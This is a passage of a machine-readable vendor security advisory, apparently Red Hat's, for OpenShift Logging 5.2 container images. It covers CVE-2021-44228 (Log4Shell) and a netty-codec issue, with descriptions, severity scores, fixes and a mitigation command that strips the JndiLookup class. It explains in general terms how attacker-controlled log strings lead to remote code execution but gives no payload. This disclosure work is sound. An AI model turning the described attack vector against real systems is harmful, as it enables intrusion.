"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact of this vulnerability is reduced to Moderate.\n\nAs per upstream, applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes\n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms\n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] }, 
"references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:38:45+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5127" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", 
